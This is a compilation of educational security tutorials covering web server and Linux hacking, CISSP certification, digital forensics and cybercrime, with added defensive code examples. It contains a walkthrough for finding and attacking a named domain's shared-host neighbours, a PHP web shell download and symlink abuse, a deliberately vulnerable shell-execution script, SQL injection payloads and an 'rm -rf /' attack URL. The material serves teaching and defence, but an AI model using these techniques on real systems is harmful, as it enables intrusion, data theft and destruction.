A web server is a program that stores files (usually web pages) and makes them accessible via a network or the internet. A web server requires both hardware and software. Attackers usually target flaws in the software to gain unauthorized entry to the server. Let’s look at some of the common vulnerabilities that attackers take advantage of.

  • Default settings – default user IDs and passwords can easily be guessed by attackers. Default settings may also allow tasks such as running commands on the server or listing directories, which an attacker can exploit.

  • Misconfiguration of operating systems and networks – for example, allowing users to execute commands on the server is dangerous if those users have weak passwords.

  • Bugs in the operating system and web server – known bugs in the operating system or web server software can be exploited to gain unauthorized access to the system.

In addition to the above-mentioned web server vulnerabilities, the following can also lead to unauthorized access:

  • Lack of security policy and procedures – the absence of a policy and procedures for tasks such as updating antivirus software and patching the operating system and web server software leaves loopholes for attackers.

Types of Web Servers

The following is a list of the common web servers

  • Apache – one of the most widely used web servers on the internet. It is cross-platform but usually installed on Linux. Most PHP websites are hosted on Apache servers.

  • Internet Information Services (IIS) – developed by Microsoft. It runs on Windows and is the other major general-purpose web server on the internet. Most ASP and ASP.NET (aspx) websites are hosted on IIS.

  • Apache Tomcat – a Java servlet container; most Java Server Pages (JSP) websites are hosted on it.

  • Other web servers – these include nginx, Novell's Web Server and IBM’s Lotus Domino.

Types of Attacks against Web Servers

  • Directory traversal attacks – this type of attack exploits insufficient validation of user-supplied file paths (typically ../ sequences, sometimes URL-encoded) to read files and folders outside the web root that were never meant to be public. Depending on what the attacker can reach, they may download configuration files and credentials, execute commands on the server or install malicious software.

  • Denial of Service Attacks – the web server crashes or becomes unavailable to legitimate users.

  • Domain Name System (DNS) Hijacking – the DNS settings are changed to point to the attacker’s web server, so all traffic meant for the real web server is redirected to the wrong one.

  • Sniffing – unencrypted data sent over the network may be intercepted and used to gain unauthorized access to the web server.

  • Phishing – the attacker sets up a fake copy of the website and lures users to it, usually by email. Unsuspecting users may be tricked into submitting sensitive data such as login details or credit card numbers.

  • Pharming – the attacker compromises DNS servers, or the resolver settings or hosts file on the user’s computer, so that the legitimate domain name resolves to a malicious site.

  • Defacement – the attacker replaces the organization’s website with a page of their own, typically containing the attacker’s name, images, messages and sometimes background music.
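Directory traversal, the first attack in the list, comes down to one function in the server: the one that turns a requested path into a file on disk. Below, as an added example that is not from the original tutorial, the vulnerable version sits beside the hardened one, tested against a throwaway web root that the script creates itself (the file names and contents are made up). The web server would already have URL-decoded the request, so encoded forms such as %2e%2e%2f arrive here as plain ../.

```python
"""Directory traversal: the vulnerable file handler next to the fixed one.
Added example; the web root and its files are created in a temp directory here."""
import os
import tempfile
from pathlib import Path


def serve_file_vulnerable(webroot: str, requested: str) -> bytes:
    """Joins the user-controlled path onto the web root and reads it.
    '../' walks out of the root, and an absolute path makes os.path.join
    discard the root entirely."""
    return Path(os.path.join(webroot, requested)).read_bytes()


def serve_file_hardened(webroot: str, requested: str) -> bytes:
    """Resolve the final path (following '..' and symlinks) and refuse anything
    that does not end up inside the web root."""
    root = Path(webroot).resolve()
    target = (root / requested.lstrip("/")).resolve()
    if target != root and root not in target.parents:
        raise PermissionError(f"path escapes web root: {requested!r}")
    if not target.is_file():
        raise FileNotFoundError(requested)
    return target.read_bytes()


def build_demo_tree() -> str:
    """Constructed layout: <tmp>/www/index.html is public, <tmp>/secret.txt is not."""
    base = Path(tempfile.mkdtemp())
    www = base / "www"
    www.mkdir()
    (www / "index.html").write_bytes(b"<h1>hello</h1>")
    (base / "secret.txt").write_bytes(b"db_password=hunter2")
    return str(www)


def escape_attempts(webroot: str, requested: str) -> dict:
    """Run one request through both handlers and report what each did."""
    out = {}
    try:
        out["vulnerable"] = serve_file_vulnerable(webroot, requested)
    except OSError as e:
        out["vulnerable"] = type(e).__name__
    try:
        out["hardened"] = serve_file_hardened(webroot, requested)
    except OSError as e:
        out["hardened"] = type(e).__name__
    return out


if __name__ == "__main__":
    root = build_demo_tree()
    for req in ("index.html", "../secret.txt", "/etc/hostname"):
        print(req, escape_attempts(root, req))
```

The check compares resolved paths rather than looking for the substring "..", which is what naive filters do and what encodings, doubled dots and symlinks get around. Serving from a dedicated unprivileged account with no read access outside the web root is the second layer, for the day the path check has a bug.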

Effects of successful attacks

  • An organization’s reputation can be ruined if the attacker edits the website content to include malicious information or links to pornographic sites

  • The web server can be used to install malicious software on the computers of users who visit the compromised website (a drive-by download). The software downloaded onto the visitor’s computer can be a virus, Trojan or botnet client, etc.

  • Compromised user data may be used for fraudulent activities, which may lead to business losses or lawsuits from the users who entrusted their details to the organization

Web server attack tools

Some of the common web server attack tools include;

  • Metasploit – an open source framework for developing, testing and using exploit code. It can be used to find vulnerable services on a web server and run exploits that compromise it.

  • MPack – a web exploitation kit written in PHP with MySQL as its database. It is installed on a compromised web server, and visitors are redirected to it so that their browsers are exploited and malware is downloaded.

  • Zeus – this tool turns a compromised computer into a bot or zombie. A bot is a compromised computer used to perform internet-based attacks; a botnet is a collection of such computers, which can then be used for denial of service attacks or sending spam.

  • Neosploit – a similar exploit kit that can install and remove programs on a compromised machine and replicate itself.

How to avoid attacks on Web server

An organization can adopt the following policy to protect itself against web server attacks.

  • Patch management – installing patches to keep the server secure. A patch is an update that fixes a bug in the software; patches apply to the operating system and to the web server software alike.

  • Secure installation and configuration of the operating system

  • Secure installation and configuration of the web server software

  • Vulnerability scanning – regular scans with tools such as Nmap and Nessus to find open ports, outdated software and misconfiguration before an attacker does (Snort, often listed here, is a network intrusion detection system, not a vulnerability scanner).

  • Firewalls can be used to stop simple DoS attacks by blocking all traffic from the attacker’s identified source IP addresses.

  • Antivirus software can be used to remove malicious software on the server

  • Disabling Remote Administration

  • Default accounts and unused accounts must be removed from the system

  • Changing default ports and settings (like FTP from port 21 to 5069) only hides a service from casual scans; a port scanner still finds it. Treat this as a supplement to removing or hardening the service, not a replacement.

Hacking Activity: Hack a WebServer

In this practical scenario, we are going to look at the anatomy of a web server attack. We will assume we are targeting www.techpanda.org. We are not actually going to hack into it as this is illegal. We will only use the domain for educational purposes.

What we will need

Information gathering

We will need to get the IP address of our target and find other websites that share the same IP address.

We will use an online tool to find the target’s IP address and other websites sharing the IP address


  • Click on Check button

  • You will get the following results

 


Based on the above results, the IP address of the target is 69.195.124.112

We also found out that there are 403 domains on the same web server.

Our next step is to scan the other websites for SQL injection vulnerabilities. Note: if we found a SQL injection vulnerability on the target itself, we would exploit it directly without considering the other websites.

  • Enter the URL www.bing.com into your web browser. The ip: operator below is specific to Bing, so this will not work with Google or Yahoo.

  • Enter the following search query

ip:69.195.124.112 .php?id=

HERE,

  • “ip:69.195.124.112” limits the search to all the websites hosted on the web server with IP address 69.195.124.112

  • “.php?id=” looks for PHP pages that take an id GET parameter, which is commonly passed straight into a SQL query.

You will get the following results


As you can see from the results, the pages on that server that take an id GET parameter are listed. These are candidates only; the search says nothing about whether any of them is actually injectable.

The next logical step would be to test the listed pages for SQL injection vulnerabilities, either manually or with the tools listed in this article on SQL Injection.
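What the `.php?id=` dork is hunting for, shown in code: an id parameter pasted into the SQL statement as text, next to the parameterized query that closes the hole. This is an added example, not code from the original tutorial or from any of the listed sites; it runs against an in-memory SQLite table whose contents are made up, and the two payloads are the classic tests a scanner or a manual tester would send to one of those pages.

```python
"""SQL injection through an id GET parameter: vulnerable query beside the fixed one.
Added example; the table and its rows are constructed for the demo."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed content: one public post and two that must stay hidden."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE posts (id INTEGER, title TEXT, published INTEGER)")
    con.executemany("INSERT INTO posts VALUES (?, ?, ?)",
                    [(1, "Welcome", 1), (2, "Draft: Q3 numbers", 0), (3, "Internal memo", 0)])
    return con


def get_post_vulnerable(con: sqlite3.Connection, id_param: str):
    """String formatting puts the attacker's text inside the statement itself,
    so a value like '1 OR 1=1 --' rewrites the WHERE clause and comments out
    the 'published = 1' restriction."""
    sql = f"SELECT id, title FROM posts WHERE id = {id_param} AND published = 1"
    return con.execute(sql).fetchall()


def get_post_parameterized(con: sqlite3.Connection, id_param: str):
    """A bound parameter is always data; it can never change the statement's
    structure. Validating the type first gives a clean 400 instead of a DB error."""
    if not id_param.isdigit():
        raise ValueError("id must be an integer")
    sql = "SELECT id, title FROM posts WHERE id = ? AND published = 1"
    return con.execute(sql, (int(id_param),)).fetchall()


# Payloads a tester would try against /page.php?id=
BOOLEAN_PAYLOAD = "1 OR 1=1 --"
UNION_PAYLOAD = "0 UNION SELECT id, title FROM posts WHERE published = 0 --"

if __name__ == "__main__":
    con = make_db()
    print("normal:     ", get_post_vulnerable(con, "1"))
    print("boolean:    ", get_post_vulnerable(con, BOOLEAN_PAYLOAD))
    print("union:      ", get_post_vulnerable(con, UNION_PAYLOAD))
    print("parameterized, same payload:")
    try:
        get_post_parameterized(con, BOOLEAN_PAYLOAD)
    except ValueError as e:
        print("  rejected:", e)
```

The UNION payload is the one that matters for the attack chain described on this page: it is how the database credentials and user table end up in the attacker's hands before any PHP shell is uploaded. Note that the fix is the bound parameter, not the isdigit check; the check only improves the error handling.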

Uploading the PHP Shell

We will not scan any of the websites listed, as this is illegal. Let’s assume that we have managed to log in to one of them. You would then upload the PHP shell downloaded from http://sourceforge.net/projects/icfdkshell/

  • Open the URL where you uploaded the dk.php file.

  • You will get the following window


  • Clicking the Symlink URL gives you access to the files in the target domain: the shell creates symbolic links from the compromised account into the other sites’ directories on the shared server.

Once you have access to the files, you can read the database credentials from the site’s configuration and do whatever you want, such as defacement or downloading data such as email addresses.

Summary

  • Web servers store valuable information and are reachable by the public. This makes them targets for attackers.

  • The commonly used web servers include Apache and Internet Information Services (IIS)

  • Attacks against web servers take advantage of bugs and misconfiguration in the operating system, web server software and network

  • Popular web server hacking tools include Neosploit, MPack, and ZeuS.

  • A good security policy can reduce the chances of being attacked


Hacking Linux OS: Complete Tutorial with Ubuntu Example

Linux is the most widely used server operating system, especially for web servers. It is open source, which means anybody, attackers included, can study the source code for vulnerabilities; it also means defenders can audit it and fixes are published quickly. In practice Linux systems are compromised through unpatched software and weak configuration far more often than through flaws found by reading the source. Linux hacking is about exploiting these vulnerabilities to gain unauthorized access to a system.

In this article, we will introduce you to what Linux is, its security vulnerabilities and the counter measures you can put in place.

 

 


Quick Note on Linux

Linux is an open source operating system. There are many distributions of Linux-based operating systems, such as Red Hat, Fedora and Ubuntu. Because the source code is freely available, it is easy for anyone to study it for vulnerabilities; the security of a Linux system therefore depends on how promptly it is patched and how carefully it is configured, not on secrecy of the code. Linux can be used as a server, desktop, tablet or mobile device operating system.

Linux programs can be operated using either GUI or commands. The commands are more effective and efficient compared to using the GUI. For this reason, it helps to know Linux basic commands.

Refer to these tutorials https://www.guru99.com/unix-linux-tutorial.html on how to get started with Linux.

Linux Hacking Tools

  • Nessus – this tool can be used to scan configuration settings, patches, networks, etc. It can be found at http://www.tenable.com/products/nessus

  • Nmap – this tool can be used to discover hosts that are up on the network and the services that they are running. It can also be used to scan for open ports. It can be found at http://nmap.org/

  • SARA – SARA is the acronym for Security Auditor’s Research Assistant. As the name implies, this tool can be used to audit networks against threats such as SQL Injection, XSS, etc. It can be found at http://www-arc.com/sara/sara.html

The above list is not exhaustive; it gives you an idea of the tools available for hacking Linux systems.

How to prevent Linux hacks

Linux Hacking takes advantage of the vulnerabilities in the operating system. An organization can adopt the following policy to protect itself against such attacks.

  • Patch management– patches fix bugs that attackers exploit to compromise a system. A good patch management policy will ensure that you constantly apply relevant patches to your system.

  • Proper OS configuration – other exploits take advantage of weaknesses in the configuration of the server. Inactive user accounts and unused daemons should be disabled. Default settings such as common application passwords, default user names and some port numbers should be changed.

  • Intrusion Detection System– such tools can be used to detect unauthorized access to the system. Some tools have the ability to detect and prevent such attacks.

Hacking Activity: Hack a Ubuntu Linux System using PHP

In this practical scenario, we will provide you with basic information on how PHP can be used to compromise a Linux system. We are not going to target any victim. If you want to try it out, you can install LAMPP on your local machine.

PHP comes with two functions that can be used to execute Linux commands. It has exec() and shell_exec() functions. The function exec() returns the last line of the command output while the shell_exec() returns the whole result of the command as a string.

For demonstration purposes, let’s assume the attacker manages to upload the following file to a web server.

<?php
// Deliberately vulnerable demonstration script (konsole.php): the command comes
// straight from the request and is handed to the shell unchecked.
$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd<br>";

// shell_exec() returns the complete output of the command as a string.
$output = shell_exec($cmd);

echo "<pre>$output</pre>";
?>

HERE,

The above script gets the command from the GET variable named cmd. The command is executed using shell_exec() and the results returned in the browser.

The above code can be exploited using the following URL

http://localhost/cp/konsole.php?cmd=ls%20-l

HERE,

  • “…konsole.php?cmd=ls%20-l” assigns the value ls -l to the variable cmd.

The command executed against the server will be

shell_exec('ls -l');

Executing the above code on a web server gives results similar to the following.

[Screenshot: output of ls -l rendered in the browser]

The above command simply displays the files in the current directory and their permissions.

Let’s suppose the attacker passes the following command

rm -rf /

HERE,

  • “rm” removes files

  • “-rf” makes rm run recursively (-r), deleting all folders and files, and forces it (-f) to do so without prompting

  • “/” instructs the command to start deleting files from the root directory

The attack URL would look something like this

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
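As an added example (not code from the original tutorial), here is a hardened counterpart to the konsole.php script above: the request can only select a named action from a fixed allowlist, the single optional argument is validated and passed through escapeshellarg(), refused requests are logged, and the output is HTML-escaped. The action names, the BASE_DIR path and the 'dir' parameter are assumptions made for this example.

```php
<?php
// Added example, not from the original tutorial: a hardened counterpart to the
// konsole.php script above. The request can only pick a named action from a fixed
// allowlist; the raw $_GET value is never handed to a shell.
declare(strict_types=1);

// Permitted action names and the exact command each runs. Nothing else can run.
const ALLOWED_ACTIONS = [
    'list'   => 'ls -l',
    'disk'   => 'df -h',
    'uptime' => 'uptime',
];

// Base directory for the optional 'dir' argument of 'list' (assumed path).
const BASE_DIR = '/var/www/html/public';

// Returns the full command for a request, or null if it must be refused.
function buildCommand(string $action, ?string $dir): ?string
{
    if (!array_key_exists($action, ALLOWED_ACTIONS)) {
        return null;                                   // unknown action
    }
    $command = ALLOWED_ACTIONS[$action];

    if ($action === 'list' && $dir !== null && $dir !== '') {
        // Accept a single plain path segment only: no slashes, no '..'.
        if ($dir === '..' || !preg_match('/^[A-Za-z0-9._-]{1,64}$/', $dir)) {
            return null;
        }
        // escapeshellarg() single-quotes the value, so metacharacters such as
        // ';', '|', '$(' or a stray quote reach the shell as literal text.
        $command .= ' ' . escapeshellarg(BASE_DIR . '/' . $dir);
    }
    return $command;
}

$action = isset($_GET['action']) && is_string($_GET['action']) ? $_GET['action'] : 'list';
$dir    = isset($_GET['dir'])    && is_string($_GET['dir'])    ? $_GET['dir']    : null;

$command = buildCommand($action, $dir);
if ($command === null) {
    // Refusals are worth logging: a burst of them is a sign someone is probing.
    error_log(sprintf('konsole: refused action=%s dir=%s from %s',
        $action, $dir ?? '', $_SERVER['REMOTE_ADDR'] ?? 'unknown'));
    http_response_code(400);
    exit('Unsupported request.');
}

$output = shell_exec($command);
$text   = is_string($output) ? $output : '';

// htmlspecialchars() keeps command output from being rendered as HTML or script,
// a second injection point the original script also left open.
echo '<pre>' . htmlspecialchars($text, ENT_QUOTES, 'UTF-8') . '</pre>';
```

Even with this in place, a script that runs shell commands on behalf of web requests should not exist on a production server at all; the safest fix is to delete it and to disable shell_exec() and exec() in php.ini via disable_functions.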

Summary

  • Linux is a popular operating system for servers, desktops, tablets and mobile devices.

  • Linux is open source, and the source code can be obtained by anyone. This makes it easy to spot the vulnerabilities.

  • Basic and networking commands are valuable to Linux hackers.

  • Vulnerabilities are a weakness that can be exploited to compromise a system.

  • A good security policy can help to protect a system from being compromised by an attacker.

CISSP Certification Guide: What is, Prerequisites, Cost, CISSP Salary

What is CISSP?

CISSP (full form: Certified Information Systems Security Professional) is considered a quality standard in the field of information security.

This cyber security certification is offered by (ISC)2, an international non-profit organization with more than 200k certified members. The certification was introduced in 1994 and is the most requested security certification on LinkedIn. The exam is available in 8 languages at 882 locations in 114 countries. The certification meets ISO/IEC Standard 17024.

Today, many IT security professionals prefer CISSP certification training. It provides information security professionals with an objective measure of competence and a globally recognized standard of achievement.

Important Domain of CISSP Certificate

A domain is a broad topic that you need to master to ace the CISSP certification exam. Here are the important CISSP Domains:

  • Domain 1. Security and Risk Management

  • Domain 2. Asset Security

  • Domain 3. Security Architecture and Engineering

  • Domain 4. Communication and Network Security

  • Domain 5. Identity and Access Management (IAM)

  • Domain 6. Security Assessment and Testing

  • Domain 7. Security Operations

  • Domain 8. Software Development Security

Skills developed after CISSP certification

At the end of the CISSP certification course you will:

  • Be able to define the architecture, design, and management of the security of your organization.

  • Have acquired the related knowledge and skills to become a qualified CISSP certified professional.

  • Have developed working knowledge in the 8 domains recommended by the CISSP Common Body of Knowledge (CBK).

  • Have learned about access control systems, security, and software development methodology.

  • Be able to optimize security operations.

Who should do a CISSP certification?

CISSP certification training is important for the following professionals:

  • Chief Information Security Officer

  • Director of Security

  • Network Architect

  • Security Consultant

  • Security Manager

  • Security Auditor

  • Security Analyst

  • IT Director/Manager

  • Managing Cloud security

  • Security Systems Engineer

How to become CISSP certified?

Here are the steps that you need to follow to become a CISSP certified professional.

Step 1) Understand Exam Format:

CISSP English is a CAT (Computer Adaptive Test) with 100 to 150 questions. You get 3 hours to take the exam. You need to score 700 out of 1000 to be certified.

Step 2) Match the Eligibility Criteria: Key prerequisites

  • You need at least 5 years of cumulative paid full-time work experience in at least two domains of the CISSP Common Body of Knowledge.

  • A 4-year college degree, a regional equivalent, or a credential from the (ISC)2 approved list satisfies 1 year of the required experience.

  • If you do not yet have the experience needed to become a CISSP professional, you can become an Associate of (ISC)2 by passing the CISSP examination.

  • The Associate of (ISC)2 then has 6 years to earn the 5 years of required experience.

  • Once you get the certification, you should recertify it after every 3 years. Recertification is accomplished by earning continuing professional education (CPE) credits and paying an annual membership fee.

Step 3) Take the Training:

Next, you need to enroll yourself in a CISSP training program to get a comprehensive understanding of the course modules. It helps you to pass the exam successfully and allows you to reduce your exam preparation stress.

Moreover, a certified instructor will guide you regarding the certification exam. You can also take the help of the CISSP training material available to get success in this exam.

Step 4) Generate your own Pearson VUE Account:

To take the CISSP exam you need a Pearson VUE account. On the Pearson VUE site, you will find details regarding testing locations, policies, accommodation, etc.

Step 5) Register to Plan Your Exam:

Now proceed with the registration, for which you will have to complete the examination agreement.

You need to attest to the truth of your statements regarding your professional experience. You will also be required to legally commit to the (ISC)2 Code of Ethics. Here, you will also need to pay the fee for your CISSP exam.

Step 6) Take the Exam:

Take the CISSP certification exam, which judges your skill and ability. Stay focused and clear it.

Step 7) Take Your (ISC)² Code of Ethics Subscription:

Once you have successfully passed the exam, you will have to subscribe to the (ISC)2 Code of Ethics to obtain your CISSP certification.

Step 8) Get Yourself Endorsed:

Lastly, you need to have your application endorsed within nine months of the date of your exam. To verify your professional experience, an endorsement form needs to be completed and signed by an (ISC)2-certified CISSP professional. He or she should be an active member in good standing.

Why become CISSP Certified?

Here are important reasons why you should enroll for the CISSP certification course:

  • CISSP is an international certificate course, not specific to any country. This gives you a global recognition.

  • After attending this training, you will have the technical knowledge, abilities, and skills to develop a holistic security program.

  • You can stand out from other CISSP certification candidates for a suitable job opening in the market for information security.

  • You will have access to valued career resources, that would include networking and exchange of ideas with peers.

  • It also gives you an opportunity to validate the skills and competence that you have gained through years of experience in the cyber security world.

  • CISSP certification increases your credibility and can provide you with a secure job.

  • You will expand your cybersecurity knowledge by enrolling in the CISSP certificate course.

  • The CISSP certification confirms that you are capable of developing information security policies, standards, and procedures.

  • It allows you to join a professional organization and to link up with like-minded individuals.

  • You enjoy perks like a free subscription to InfoSecurity Professional Magazine, 50% off (ISC)2 textbooks, webinar attendance, and digital badges to showcase your expertise.

Course Objectives of CISSP Certification

Here are some objectives of this certificate course:

  • Become familiar with the (ISC)2 Common Body of Knowledge (CBK), which includes common terms, principles, lists, categories, etc.

  • Become familiar with the CISSP exam process.

  • Be able to develop a study plan for taking and passing the exam.

  • Widen your knowledge of software security concepts and practices.

  • Become more marketable in a competitive workforce.

  • Show your dedication to the security discipline.

  • Improve your credibility and value as an employee, as (ISC)2 security certifications are recognized internationally.

  • Increase credibility and goodwill for your organization when working with vendors and contractors.

  • Gain a universal security language with industry-accepted terms and practices.

Guide to ace CISSP certification

Here are some useful tips for getting CISSP certification.

  • Determine how many days you need to prepare for this exam, form a local study group and discuss difficult topics or questions with them.

  • Focus on the domains that you do not know or in which you are weak.

  • Practise with a minimum of 50 questions per domain.

  • Bring your scores up to a consistent 80%.

  • You will mostly need two to three months of study to complete the CISSP course material.

  • Use multiple study resources, for example reference books, learning materials, online eLearning and free test resources.

  • Prepare for the endorsement process.

  • Read the exam questions carefully, and first attempt the questions for which you know the answers.

  • Watch the clock regularly: the linear exam has 250 questions in a maximum of 6 hours, while the CAT has 100 questions in 3 hours.

  • Remember that the CISSP exam may still contain questions that you might think are outdated in the real world.

Salary of CISSP certified professional.

According to a Global Information Security study, CISSP certified professionals earn 25% more salary than their non-certified counterparts. It is among the top highest-paying jobs in the TechRepublic job trend survey.

Therefore, the salary of a CISSP security professional is much higher as compared to the others who are not certified. However, the pay scale may differ from region to region and country to country.

Summary

CISSP (full form: Certified Information Systems Security Professional) is considered a quality standard in the field of information security.

  • Steps to get CISSP certification are: Match the eligibility criteria, Take the training, Generate your own Pearson VUE Account, Pass the Exam, Take Your (ISC)² Code of Ethics Subscription, Get Yourself Endorsed.

  • CISSP is an international certificate course, not specific to any country. This gives you a global recognition.

  • Security and Risk Management, Security Engineering, Communications and Network Security, Identity and Access Management are important domains of CISSP

  • After the successful CISSP training, you will acquire the related knowledge and skills to become a qualified CISSP certificated professional.

  • CISSP certification training is relevant to Chief Information Security Officer, Director of Security, Network Architect, Security Consultant, Security Manager, Security Auditor, Security Analyst, etc.

  • Determine how many days you need to prepare for this exam, form a local study group and discuss difficult topics or questions with them.

  • According to a Global Information Security study, CISSP certified professionals earn 25% more salary than their non-certified counterparts.

  • CISSP certification cost is $699



What is Digital Forensics? History, Process, Types, Challenges

What is Digital Forensics?

Digital Forensics is defined as the process of preservation, identification, extraction, and documentation of computer evidence which can be used in a court of law. It is the science of finding evidence on digital media such as a computer, mobile phone, server, or network. It provides the forensic team with the best techniques and tools to solve complicated digital-related cases.

Digital Forensics helps the forensic team to analyze, inspect, identify, and preserve the digital evidence residing on various types of electronic devices.

History of Digital forensics

Here are important landmarks from the history of Digital Forensics:

  • Hans Gross (1847 -1915): First use of scientific study to head criminal investigations

  • FBI (1932): Set up a lab to offer forensics services to all field agents and other law authorities across the USA.

  • In 1978 the first computer crime was recognized in the Florida Computer Crime Act.

  • Francis Galton (1822 - 1911): Conducted the first recorded study of fingerprints

  • In 1992, the term Computer Forensics was used in academic literature.

  • In 1995, the International Organization on Computer Evidence (IOCE) was formed.

  • In 2000, the first FBI Regional Computer Forensic Laboratory was established.

  • In 2002, the Scientific Working Group on Digital Evidence (SWGDE) published the first book about digital forensics, called "Best practices for Computer Forensics".

  • In 2010, Simson Garfinkel identified issues facing digital investigations.

Objectives of computer forensics

Here are the essential objectives of using Computer forensics:

  • It helps to recover, analyze, and preserve computer and related materials in such a manner that it helps the investigation agency to present them as evidence in a court of law.

  • It helps to postulate the motive behind the crime and identity of the main culprit.

  • Designing procedures at a suspected crime scene which helps you to ensure that the digital evidence obtained is not corrupted.

  • Data acquisition and duplication: Recovering deleted files and deleted partitions from digital media to extract the evidence and validate them.

  • Helps you to identify the evidence quickly, and also allows you to estimate the potential impact of the malicious activity on the victim

  • Producing a computer forensic report which offers a complete report on the investigation process.

  • Preserving the evidence by following the chain of custody.

Process of Digital forensics

Digital forensics entails the following steps:

  • Identification

  • Preservation

  • Analysis

  • Documentation

  • Presentation

[Figure: Process of Digital Forensics]

Let's study each in detail.

Identification

It is the first step in the forensic process. The identification process mainly includes things like what evidence is present, where it is stored, and lastly, how it is stored (in which format).

Electronic storage media can be personal computers, Mobile phones, PDAs, etc.

Preservation

In this phase, data is isolated, secured, and preserved. It includes preventing people from using the digital device so that digital evidence is not tampered with.

Analysis

In this step, investigation agents reconstruct fragments of data and draw conclusions based on evidence found. However, it might take numerous iterations of examination to support a specific crime theory.

Documentation

In this process, a record of all the visible data must be created. It helps in recreating the crime scene and reviewing it. It involves proper documentation of the crime scene along with photographing, sketching, and crime-scene mapping.

Presentation

In this last step, the process of summarization and explanation of conclusions is done.

However, it should be written in a layperson's terms using abstracted terminologies. All abstracted terminologies should reference the specific details.

Types of Digital Forensics

The main types of digital forensics are:

Disk Forensics:

It deals with extracting data from storage media by searching active, modified, or deleted files.

Network Forensics:

It is a sub-branch of digital forensics. It is related to monitoring and analysis of computer network traffic to collect important information and legal evidence.

Wireless Forensics:

It is a division of network forensics. The main aim of wireless forensics is to offer the tools needed to collect and analyze data from wireless network traffic.

Database Forensics:

It is a branch of digital forensics relating to the study and examination of databases and their related metadata.

Malware Forensics:

This branch deals with the identification of malicious code (viruses, worms, etc.) and the study of its payload.

Email Forensics

Deals with recovery and analysis of emails, including deleted emails, calendars, and contacts.

Memory Forensics:

It deals with collecting data from system memory (system registers, cache, RAM) in raw form and then carving the data from the raw dump.

Mobile Phone Forensics:

It mainly deals with the examination and analysis of mobile devices. It helps to retrieve phone and SIM contacts, call logs, incoming, and outgoing SMS/MMS, Audio, videos, etc.

Challenges faced by Digital Forensics

Here are the major challenges faced by digital forensics:

  • The increase in PCs and the extensive use of Internet access

  • Easy availability of hacking tools

  • Lack of physical evidence makes prosecution difficult.

  • The large amount of storage space, running into terabytes, makes the investigation job difficult.

  • Any technological changes require an upgrade or changes to solutions.

Example Uses of Digital Forensics

In recent times, commercial organizations have used digital forensics in the following types of cases:

  • Intellectual Property theft

  • Industrial espionage

  • Employment disputes

  • Fraud investigations

  • Inappropriate use of the Internet and email in the workplace

  • Forgery-related matters

  • Bankruptcy investigations

  • Issues concerning regulatory compliance

Advantages of Digital forensics

Here are the pros/benefits of digital forensics:

  • To ensure the integrity of the computer system.

  • To produce evidence in the court, which can lead to the punishment of the culprit.

  • It helps the companies to capture important information if their computer systems or networks are compromised.

  • Efficiently tracks down cybercriminals from anywhere in the world.

  • Helps to protect the organization's money and valuable time.

  • Allows the extraction, processing, and interpretation of factual evidence, so that the cybercriminal's actions can be proved in court.

Disadvantages of Digital Forensics

Here are the major cons/drawbacks of using digital forensics:

  • Digital evidence is accepted into court. However, it must be proved that there has been no tampering.

  • Producing electronic records and storing them is an extremely costly affair

  • Legal practitioners must have extensive computer knowledge

  • Need to produce authentic and convincing evidence

  • If the tool used for digital forensics does not meet the specified standards, then the evidence can be rejected by the court.

  • Lack of technical knowledge on the part of the investigating officer might not deliver the desired result.

Summary:

  • Digital Forensics is the preservation, identification, extraction, and documentation of computer evidence which can be used in the court of law

  • Process of Digital forensics includes 1) Identification, 2) Preservation, 3) Analysis, 4) Documentation and, 5) Presentation

  • Different types of Digital Forensics are Disk Forensics, Network Forensics, Wireless Forensics, Database Forensics, Malware Forensics, Email Forensics, Memory Forensics, etc.

  • Digital forensic Science can be used for cases like 1) Intellectual Property theft, 2) Industrial espionage 3) Employment disputes, 4) Fraud investigations.

What is Cybercrime? Types, Tools, Examples

What is Cybercrime?

Cybercrime is defined as an unlawful action against any person using a computer, its systems, and its online or offline applications. It occurs when information technology is used to commit or cover an offense. However, the act is only considered Cybercrime if it is intentional and not accidental.

In this tutorial, you will learn:

Example of Cybercrime

Here are some of the most commonly occurring cybercrimes:

  • Fraud committed by manipulating a computer network

  • Unauthorized access to or modification of data or application

  • Intellectual property theft that includes software piracy

  • Industrial spying and access to or theft of computer materials

  • Writing or spreading computer viruses or malware

  • Digitally distributing child pornography

Cybercrime Attack Types

Cybercrime can be carried out in various ways. Here are some of the most common cybercrime attack modes:

Hacking:

It is an act of gaining unauthorized access to a computer system or network.

Denial Of Service Attack:

In this cyberattack, the cyber-criminal consumes the bandwidth of the victim's network or floods their e-mail box with spam. Here, the intention is to disrupt their regular services.

Software Piracy:

Theft of software by illegally copying genuine programs or counterfeiting. It also includes the distribution of products intended to pass for the original.

Phishing:

Phishing is a technique of extracting confidential information from bank/financial institution account holders by illegal means.

Spoofing:

It is an act of getting one computer system or a network to pretend to have the identity of another computer. It is mostly used to get access to exclusive privileges enjoyed by that network or computer.

Cyber Crime Tools

There are many types of digital forensic tools:

Kali Linux:

Kali Linux is an open-source distribution that is maintained and funded by Offensive Security. It is specially designed for digital forensics and penetration testing.

Ophcrack:

This tool is mainly used for cracking the password hashes that Windows stores in its SAM files. It offers a GUI and runs on multiple platforms.

EnCase:

This software allows an investigator to image and examine data from hard disks and removable disks.

SafeBack:

SafeBack is mainly used for imaging the hard disks of Intel-based computer systems and restoring these images to other hard disks.

Data dumper:

This is a command-line computer forensic tool, freely available for the UNIX operating system, which can make exact copies of disks suitable for digital forensic analysis.

Md5sum:

A tool that helps you check whether data was copied to another storage device successfully, by comparing hashes of the source and the copy.

Summary:

  • Cybercrime is an unlawful action against any person using a computer, its systems, and its online or offline applications.

  • Fraud committed by manipulating a computer network is an example of cybercrime.

  • Various types of Cyber crime attack modes are 1) Hacking 2) Denial Of Service Attack 3) Software Piracy 4) Phishing 5) Spoofing.

  • Some important tools used for investigating cyber attacks are 1) Kali Linux, 2) Ophcrack, 3) EnCase, 4) SafeBack, 5) Data Dumper.

  • Kali Linux is an open-source software that is maintained and funded by Offensive Security.

  • Ophcrack is a tool that is mainly used for cracking the password hashes that Windows stores in its SAM files.

  • EnCase tool allows an investigator to image and examine data from hard disks and removable disks

  • SafeBack is mainly used for imaging the hard disks of Intel-based computer systems and restoring these images to other hard disks.

  • Data dumper is a command-line computer forensic tool.

  • Md5sum helps you check whether data was copied to another storage device successfully.

10 Most Common Web Security Vulnerabilities

OWASP, the Open Web Application Security Project, is a non-profit charitable organization focused on improving the security of software and web applications.

